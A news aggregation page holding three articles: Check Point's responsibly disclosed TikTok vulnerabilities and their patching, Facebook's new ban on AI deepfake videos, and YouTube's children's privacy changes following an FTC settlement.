Categories
Check Point china computer security Cyberattacks and Hackers Mobile Applications TikTok (ByteDance) Uncategorized Video Recordings, Downloads and Streaming

Major TikTok Security Flaws Found

TEL AVIV — TikTok, the smartphone app beloved by teenagers and used by hundreds of millions of people around the world, had serious vulnerabilities that would have allowed hackers to manipulate user data and reveal personal information, according to research published Wednesday by Check Point, a cybersecurity company in Israel.

The weaknesses would have allowed attackers to send TikTok users messages that carried malicious links. Once users clicked on the links, attackers would have been able to take control of their accounts, including uploading videos or gaining access to private videos. A separate flaw allowed Check Point researchers to retrieve personal information from TikTok user accounts through the company’s website.

“The vulnerabilities we found were all core to TikTok’s systems,” said Oded Vanunu, Check Point’s head of product vulnerability research.

TikTok learned about the conclusions of Check Point’s research on Nov. 20 and said it had fixed all of the vulnerabilities by Dec. 15.

The app, whose parent company is based in Beijing, has been called “the last sunny corner on the internet.” It allows users to post short, creative videos, which can easily be shared on various apps.

It has also become a target of lawmakers and regulators who are suspicious of Chinese technology. Several branches of the United States military have barred personnel from having the app on government-issued smartphones. The vulnerabilities discovered by Check Point are likely to compound those concerns.

TikTok has exploded in popularity over the past two years, becoming a rare Chinese internet success story in the West. It has been downloaded more than 1.5 billion times, according to the data firm Sensor Tower. Near the end of 2019, the research firm said TikTok appeared to be on its way to more downloads for the year than better-known apps from Facebook, Instagram, YouTube and Snap.

But new apps like TikTok offer opportunities for hackers looking to target services that haven’t been tested through years of security research and real-world attacks. And many of its users are young and perhaps not mindful of security updates.

“TikTok is committed to protecting user data,” said Luke Deshotels, the head of TikTok’s security team.

“Like many organizations, we encourage responsible security researchers to privately disclose zero day vulnerabilities to us,” he added. “Before public disclosure, Check Point agreed that all reported issues were patched in the latest version of our app. We hope that this successful resolution will encourage future collaboration with security researchers.”

Mr. Deshotels said there was no indication in customer records that a breach or an attack had occurred.

TikTok’s parent company, ByteDance, is one of the world’s most valuable tech start-ups. But TikTok’s popularity and its roots in China, where no large corporation can thrive outside the good graces of the government, have prompted intense scrutiny of the app’s content policies and data practices.

American lawmakers have expressed concern that TikTok censors material that the Chinese government does not like and allows Beijing to collect user data. TikTok has denied both accusations. The company also says that although ByteDance’s headquarters are in Beijing, regional managers for TikTok have significant autonomy over operations.

Check Point’s intelligence unit examined how easy it would be to hack into TikTok user accounts. It found that various functions of the app, including sending video files, had security issues.

“I would expect these types of vulnerabilities in a company like TikTok, which is probably more focused on tremendous growth, and on building new features for their users, rather than security,” said Christoph Hebeisen, the head of research at Lookout, another cybersecurity company.

One vulnerability allowed attackers to use a link in TikTok’s messaging system to send users messages that appeared to come from TikTok. The Check Point researchers tested the weakness by sending themselves links with malware that let them take control of accounts, uploading content, deleting videos and making private videos public.

The researchers also found that TikTok’s site was vulnerable to a type of attack that injects malicious code into trusted websites. Check Point researchers were able to retrieve users’ personal information, including names and birth dates.

Check Point sent a summary of its findings to the Department of Homeland Security in the United States.

The Committee on Foreign Investment in the United States, a panel that reviews investment deals on national security grounds, is also looking into ByteDance’s 2017 acquisition of Musical.ly, a lip-syncing app that the company later merged into TikTok. That deal set the stage for TikTok’s rapid rise in the United States and Europe.

There are also concerns about the company’s data privacy practices. In February, the Federal Trade Commission filed a complaint against TikTok, saying it illegally collected personal information from minors. The complaint claimed that Musical.ly had violated the Children’s Online Privacy Protection Act, which requires websites and online companies to direct children under 13 to get parental consent before the companies collect personal information.

TikTok agreed to pay $5.7 million to settle the complaint and said it would abide by COPPA. TikTok is still being investigated by the British Information Commissioner’s Office to determine if it violated European privacy laws that offer special protections to minors and their data.

Ronen Bergman reported from Tel Aviv, Sheera Frenkel from San Francisco, and Raymond Zhong from Hong Kong.

Categories
Bickert, Monika Computers and the Internet Facebook Inc Presidential Election of 2020 Rumors and Misinformation Social Media Uncategorized United States Politics and Government Video Recordings, Downloads and Streaming

Facebook Says It Will Ban ‘Deepfakes’

WASHINGTON — Facebook said on Monday that it would ban videos that are heavily manipulated by artificial intelligence, known as deepfakes, from its platform.

In a blog post, a company executive said Monday evening that the social network would remove videos altered by artificial intelligence in ways that “would likely mislead someone into thinking that a subject of the video said words that they did not actually say.”

The policy will not extend to parody or satire, the executive, Monika Bickert, said, nor will it apply to videos edited to omit or change the order of words.

Ms. Bickert said all videos posted would still be subject to Facebook’s system for fact-checking potentially deceptive content. And content that is found to be factually incorrect appear less prominently on the site’s news feed and is labeled false.

The company’s new policy was first reported by The Washington Post.

Facebook was heavily criticized last year for refusing to take down an altered video of Speaker Nancy Pelosi that had been edited to make it appear as though she was slurring her words. At the time, the company defended its decision, saying it had subjected the video to its fact-checking process and had reduced its reach on the social network.

It did not appear that the new policy would have changed the company’s handling of the video with Ms. Pelosi.

The announcement comes ahead of a hearing before the House Energy & Commerce Committee on Wednesday morning, during which Ms. Bickert, Facebook’s vice president of global policy management, is expected to testify on “manipulation and deception in the digital age,” alongside other experts.

Because Facebook is still the No. 1 platform for sharing false political stories, according to disinformation researchers, the urgency to spot and halt novel forms of digital manipulation before they spread is paramount.

Computer scientists have long warned that new techniques used by machines to generate images and sounds that are indistinguishable from the real thing can vastly increase the volume of false and misleading information online. And false political information is circulating rapidly online ahead of the 2020 presidential elections in the United States.

In late December, Facebook announced it had removed hundreds of accounts, including pages, groups and Instagram feeds, meant to fool users in the United States and Vietnam with fake profile photos generated with the help of artificial intelligence.

David McCabe reported from Washington, and Davey Alba from New York.

Categories
Data-Mining and Database Marketing Federal Trade Commission Google Inc Online Advertising privacy Uncategorized Video Recordings, Downloads and Streaming YouTube.com

4 Things to Know About YouTube’s New Children Privacy Practices

In September, Google agreed to pay a $170 million fine and make privacy changes as regulators said that its YouTube platform had illegally harvested children’s personal information and used it to profit by targeting them with ads. The penalty and changes were part of an agreement with the Federal Trade Commission and the attorney general of New York, which had accused YouTube of violating the federal Children’s Online Privacy Protection Act.

On Monday, YouTube said it was beginning to introduce changes to address regulators’ concerns and better protect children. Here is what you need to know about those changes.

YouTube said that, starting Monday, it would begin to limit the collection and use of personal information from people who watched children’s videos, no matter the age of the viewer. Federal law prohibits online services aimed at children under 13 from collecting the personal information of those young users without parental consent.

YouTube said it had also turned off or limited some features on children’s videos tied to personal information. These include comments and live-chat features, as well as the ability to save videos to a playlist.

YouTube will no longer show ads on children’s videos that are targeted at viewers based on their web-browsing or other online activity data. Instead, the company said, it may now show ads based on the context of what people are viewing.

YouTube said viewers who watched a video made for children on its platform would now be more likely to see recommendations for other children’s videos.

In September, YouTube said it would require all video producers on its platform to designate their videos as made for children or not made for children. In November, it introduced a new setting to help producers flag children’s content, a designation that signals YouTube to limit data collection on those videos. The video service said that it was also using artificial intelligence to help identify children’s content and that it could override a video producer’s categorization if its system detected a mistake.

YouTube is one of the most popular platforms for children. Some animated videos on YouTube channels aimed at younger children — like Cocomelon Nursery Rhymes and ChuChu TV — have been viewed more than a billion times.

The platform’s new limits on data-mining send a signal to other popular sites offering children’s content that they also may be subject to the federal children’s online privacy law. Musical.ly, a wildly popular video social network now known as TikTok, also had to pay a fine last year to settle F.T.C. charges that it had illegally collected children’s personal information.